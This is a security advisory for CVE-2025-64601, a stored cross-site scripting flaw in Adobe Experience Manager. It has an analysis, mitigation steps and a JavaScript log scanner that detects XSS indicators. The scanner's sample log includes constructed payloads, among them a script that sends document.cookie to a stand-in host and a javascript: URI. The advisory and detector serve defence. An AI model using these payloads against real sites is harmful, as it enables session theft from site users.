
CVE-2025-64601: Cross-site Scripting (Stored XSS) (CWE-79) in Adobe Experience Manager

Medium
Tags: Vulnerability, CVE-2025-64601, CWE-79
Published: Wed Dec 10 2025 (12/10/2025, 18:23:56 UTC)
Source: CVE Database V5
Vendor/Project: Adobe
Product: Adobe Experience Manager

Description

CVE-2025-64601 is a stored cross-site scripting (XSS) vulnerability affecting Adobe Experience Manager (AEM) versions 6.5.23 and earlier. A low-privileged attacker can inject malicious JavaScript into vulnerable form fields; the payload is persisted by the server and executes in the browsers of users who later view the affected pages. Exploitation requires privileges to submit form data and user interaction (a victim must view the page), but it can compromise confidentiality and integrity, for example by stealing session tokens or manipulating page content. The CVSS score is 5.4 (medium severity), reflecting a network attack vector, low complexity, low privileges, required user interaction, and limited impact on confidentiality and integrity. No known exploits are currently in the wild, and no patches have been linked yet. European organizations using AEM for content management and digital experience delivery are at risk, especially in countries with high adoption of Adobe products and significant digital infrastructure. Mitigation requires prompt patching once available, output encoding at every render point, server-side input validation, and restricting who can submit form field content.

AI-Powered Analysis

AI analysis last updated: 12/17/2025, 21:00:40 UTC

Technical Analysis

CVE-2025-64601 is a stored cross-site scripting (XSS) vulnerability identified in Adobe Experience Manager (AEM) versions 6.5.23 and earlier. The vulnerability arises from insufficient sanitization and output encoding of user input in certain form fields: a low-privileged attacker submits JavaScript that is persisted on the server, and the stored payload is later emitted into page markup without encoding. When other users access the affected pages, the script executes in their browsers within the origin of the vulnerable site. From that position it can issue authenticated requests as the victim, read page content, rewrite what the victim sees, or exfiltrate data, impacting confidentiality and integrity. Reading the session cookie directly through document.cookie only works if the cookie lacks the HttpOnly flag; even with HttpOnly set, injected script can still drive the victim's session from inside the browser, so the flag limits but does not remove the impact.

The vulnerability has a CVSS 3.1 base score of 5.4 (medium severity). The attack vector is network-based with low attack complexity; it requires low privileges (an account able to submit form data) and user interaction (the victim must view the page that contains the payload). The scope is changed, which in CVSS 3.1 terms means the vulnerable component (the AEM server) differs from the impacted component (the victim's browser); the metrics described here correspond to the vector AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N. No known exploits have been reported in the wild, and no official patches had been published at the time of disclosure. Adobe Experience Manager is widely used by enterprises and public sector organizations for managing digital content and customer experiences, so the vulnerability matters wherever AEM renders user-submitted content, and especially where content authors or administrators view that content while logged in. Exploitation could facilitate further attacks such as phishing, privilege escalation, or data exfiltration if combined with other weaknesses.

Potential Impact

For European organizations, the impact of CVE-2025-64601 can be significant, especially for those relying heavily on Adobe Experience Manager for web content management and digital experience platforms. Exploitation could expose sensitive information, including session tokens and user credentials, potentially enabling attackers to impersonate legitimate users or administrators. The most damaging case is an AEM author or administrator viewing attacker-controlled content while logged in, since script running with their session could alter content or accounts. This compromises the confidentiality and integrity of data and may facilitate further attacks such as lateral movement or malware delivery through modified pages. The vulnerability does not directly affect availability, but it can undermine trust in affected web services, causing reputational damage and potential regulatory scrutiny under GDPR if personal data is compromised. Organizations in sectors such as finance, government, healthcare, and e-commerce, which often use AEM for customer-facing portals, are particularly at risk. Because the payload is stored, victims need only view the legitimate AEM page that contains it; phishing or social engineering can be used to steer targeted users to that page and increase exploitation success. Given the widespread use of Adobe products in Europe, the threat could have broad implications if not addressed promptly.

Mitigation Recommendations

1. Monitor Adobe's official security bulletins closely and apply patches or updates for Adobe Experience Manager as soon as they become available.
2. Apply context-aware output encoding wherever stored form data is rendered, and validate input on the server side, even before official patches are released. Encoding at render time is the control that actually stops stored XSS; validation alone is bypassable. In HTL templates, keep the default display-context escaping and avoid context='unsafe' for user-supplied values.
3. Employ a Content Security Policy (CSP) that disallows inline scripts (nonce- or hash-based script-src without 'unsafe-inline'), so an injected inline script or event handler is blocked even where encoding is missed; roll it out in report-only mode first, since AEM components may depend on inline scripts. Alongside CSP, set the HttpOnly and SameSite attributes on session cookies so injected script cannot read the session token.
4. Limit user privileges to the minimum necessary, and restrict which accounts may submit or author form content, reducing the ability of low-privileged users to inject malicious content.
5. Conduct regular security audits and penetration testing focusing on web application vulnerabilities, including stored XSS in form handlers and in the author views where submissions are reviewed.
6. Educate users and administrators about phishing and social engineering risks to reduce the likelihood of user interaction with malicious links.
7. Use web application firewalls (WAFs) configured to detect and block common XSS attack patterns targeting AEM, treating them as defense in depth rather than a fix, since encoding tricks can evade signature rules.
8. Review and harden AEM configurations, disabling unnecessary features or components that could be exploited.
9. Implement robust logging and monitoring to detect suspicious form submissions, including script tags, inline event handlers and javascript: URIs, after undoing URL and entity encoding.
10. Consider isolating critical AEM instances or sensitive content behind additional authentication layers or network segmentation; in particular, keep author instances, where logged-in authors view submitted content, off the public internet.
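One concrete start on recommendation 9, as an added example that is not code from the page or from Adobe: a small detector that reviews form-submission log records for stored-XSS indicators, undoing repeated URL encoding and one round of HTML entity encoding before matching, so the evasions that defeat single-pass filters are still caught. The JSON record shape, the field names and every sample line are constructed for illustration; AEM's request logs use a different format and would need their own parser.

```javascript
// Added example, not code from the page or from Adobe. The JSON record shape,
// field names and all sample lines below are constructed for illustration.

// Constructed sample: one record per form POST, with the submitted field values.
const SAMPLE_LOG = [
  '{"ts":"2025-12-11T09:14:02Z","user":"alice","path":"/content/site/feedback.html","fields":{"message":"Great article, thanks"}}',
  '{"ts":"2025-12-11T09:15:17Z","user":"mallory","path":"/content/site/feedback.html","fields":{"message":"%3Cscript%3Enew%20Image().src%3D%27https://x.example/%3F%27%2Bdocument.cookie%3C/script%3E"}}',
  '{"ts":"2025-12-11T09:16:40Z","user":"mallory","path":"/content/site/profile.html","fields":{"website":"javascript:alert(document.domain)","bio":"hi"}}',
  '{"ts":"2025-12-11T09:17:03Z","user":"bob","path":"/content/site/feedback.html","fields":{"message":"<b>bold</b> is fine"}}',
  '{"ts":"2025-12-11T09:18:55Z","user":"carol","path":"/content/site/feedback.html","fields":{"message":"&lt;svg onload=alert(1)&gt;"}}',
];

// Undo URL encoding repeatedly, because attackers double-encode to slip past
// single-pass filters. Stops on a malformed %-sequence or when nothing changes.
function urlDecodeRepeated(s, maxRounds = 3) {
  let out = s;
  for (let i = 0; i < maxRounds; i++) {
    let next;
    try {
      next = decodeURIComponent(out);
    } catch (e) {
      break; // malformed sequence: keep what we have
    }
    if (next === out) break;
    out = next;
  }
  return out;
}

// Undo one round of HTML entity encoding (numeric and the common named forms),
// so payloads the form stored as entities are still inspected.
function decodeEntities(s) {
  const named = { lt: "<", gt: ">", quot: '"', apos: "'", amp: "&" };
  return s
    .replace(/&#x([0-9a-f]{1,6});/gi, (m, hex) => {
      const cp = parseInt(hex, 16);
      return cp <= 0x10ffff ? String.fromCodePoint(cp) : m;
    })
    .replace(/&#(\d{1,7});/g, (m, dec) => {
      const cp = parseInt(dec, 10);
      return cp <= 0x10ffff ? String.fromCodePoint(cp) : m;
    })
    .replace(/&(lt|gt|quot|apos|amp);/gi, (m, name) => named[name.toLowerCase()]);
}

// Canonical form the rules run against.
function normalize(value) {
  return decodeEntities(urlDecodeRepeated(String(value))).toLowerCase();
}

// Indicator rules, deliberately narrow so ordinary markup such as <b> or a plain
// URL does not fire. They are triage signals for analysts, not a WAF.
const RULES = [
  ["script-tag", /<\s*script\b/],
  ["event-handler", /<[^>]*\son[a-z]+\s*=/], // on*= attribute inside a tag
  ["javascript-uri", /javascript\s*:/],
  ["embedded-frame", /<\s*(?:iframe|object|embed)\b/],
];

// Names of every rule that matches the normalized value.
function findIndicators(value) {
  const norm = normalize(value);
  return RULES.filter(([, re]) => re.test(norm)).map(([name]) => name);
}

// Walk the log, one JSON record per line, skipping lines that do not parse.
function scanLog(lines) {
  const findings = [];
  for (const line of lines) {
    let rec;
    try {
      rec = JSON.parse(line);
    } catch (e) {
      continue;
    }
    for (const [field, value] of Object.entries(rec.fields || {})) {
      const rules = findIndicators(value);
      if (rules.length > 0) {
        findings.push({ ts: rec.ts, user: rec.user, path: rec.path, field, rules });
      }
    }
  }
  return findings;
}

for (const f of scanLog(SAMPLE_LOG)) {
  console.log(`${f.ts} user=${f.user} path=${f.path} field=${f.field} rules=${f.rules.join(",")}`);
}
```

Run against the constructed sample, the detector flags the URL-encoded script from mallory, the javascript: URI in the profile form, and the entity-encoded SVG handler from carol, while alice's and bob's submissions pass. Feeding it real submissions is what turns recommendation 9 into something an analyst can act on; an alert that names the account and the form is also the starting point for the privilege review in recommendation 4.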


Technical Details

Data Version
5.2
Assigner Short Name
adobe
Date Reserved
2025-11-05T22:53:10.941Z
Cvss Version
3.1
State
PUBLISHED

Threat ID: 6939bdacfe7b3954b690bb43

Added to database: 12/10/2025, 6:36:28 PM

Last enriched: 12/17/2025, 9:00:40 PM

Last updated: 2/4/2026, 4:11:40 AM

